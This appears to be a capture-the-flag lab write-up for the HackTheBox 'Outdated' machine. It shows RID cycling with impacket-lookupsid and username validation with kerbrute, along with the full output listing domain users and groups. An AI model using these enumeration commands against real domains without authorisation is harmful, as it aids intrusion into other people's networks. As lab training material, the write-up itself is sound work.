InfoSec LAB

Outdated_RID_Cycling

Created: 2 min read

RID Cycling

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ impacket-lookupsid OUTDATED.HTB/blahblah@dc.outdated.htb 100000
Impacket v0.11.0 - Copyright 2023 Fortra
 
password:
[*] Brute forcing SIDs at dc.outdated.htb
[*] stringbinding ncacn_np:dc.outdated.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-4089647348-67660539-4016542185
498: OUTDATED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: OUTDATED\Administrator (SidTypeUser)
501: OUTDATED\Guest (SidTypeUser)
502: OUTDATED\krbtgt (SidTypeUser)
512: OUTDATED\Domain Admins (SidTypeGroup)
513: OUTDATED\Domain Users (SidTypeGroup)
514: OUTDATED\Domain Guests (SidTypeGroup)
515: OUTDATED\Domain Computers (SidTypeGroup)
516: OUTDATED\Domain Controllers (SidTypeGroup)
517: OUTDATED\Cert Publishers (SidTypeAlias)
518: OUTDATED\Schema Admins (SidTypeGroup)
519: OUTDATED\Enterprise Admins (SidTypeGroup)
520: OUTDATED\Group Policy Creator Owners (SidTypeGroup)
521: OUTDATED\Read-only Domain Controllers (SidTypeGroup)
522: OUTDATED\Cloneable Domain Controllers (SidTypeGroup)
525: OUTDATED\Protected Users (SidTypeGroup)
526: OUTDATED\Key Admins (SidTypeGroup)
527: OUTDATED\Enterprise Key Admins (SidTypeGroup)
553: OUTDATED\RAS and IAS Servers (SidTypeAlias)
571: OUTDATED\Allowed RODC Password Replication Group (SidTypeAlias)
572: OUTDATED\Denied RODC Password Replication Group (SidTypeAlias)
1000: OUTDATED\WSUS Administrators (SidTypeAlias)
1001: OUTDATED\WSUS Reporters (SidTypeAlias)
1002: OUTDATED\DC$ (SidTypeUser)
1103: OUTDATED\DnsAdmins (SidTypeAlias)
1104: OUTDATED\DnsUpdateProxy (SidTypeGroup)
1105: OUTDATED\CLIENT$ (SidTypeUser)
1106: OUTDATED\btables (SidTypeUser)
1107: OUTDATED\ITStaff (SidTypeGroup)
1108: OUTDATED\sflowers (SidTypeUser)

performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah Found the following domain users;

  • administrator
  • DC$
  • CLIENT$
  • btables
  • sflowers

I will first validate these users

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ kerbrute userenum --dc dc.outdated.htb -d OUTDATED.HTB users.txt
 
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
 
Version: v1.0.3 (9dad6e1) - 01/03/24 - Ronnie Flathers @ropnop
 
2024/01/03 15:22:55 >  Using KDC(s):
2024/01/03 15:22:55 >   dc.outdated.htb:88
 
2024/01/03 15:22:55 >  [+] VALID USERNAME:       administrator@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       DC$@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       sflowers@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       btables@OUTDATED.HTB
2024/01/03 15:22:55 >  [+] VALID USERNAME:       CLIENT$@OUTDATED.HTB
2024/01/03 15:22:55 >  Done! Tested 5 usernames (5 valid) in 0.029

All 5 users have been validated against the target KDC

Interestingly, both CLIENT$ and sflowers users were initially found through kerbrute brute-force attack earlier, and an additional measure was in development as the target domain appeared to use a naming convention, considering the username of the sflowers user However, it may not be worth going down the username enumeration process based off a suspected naming convention given and considering there are only 5 valid users identified through the RID cycling attack above.

Additionally, presence of SIDs with WSUS further suggests that the target domain has Windows Server Update Services (WSUS) installed

Interactive Graph View

Backlinks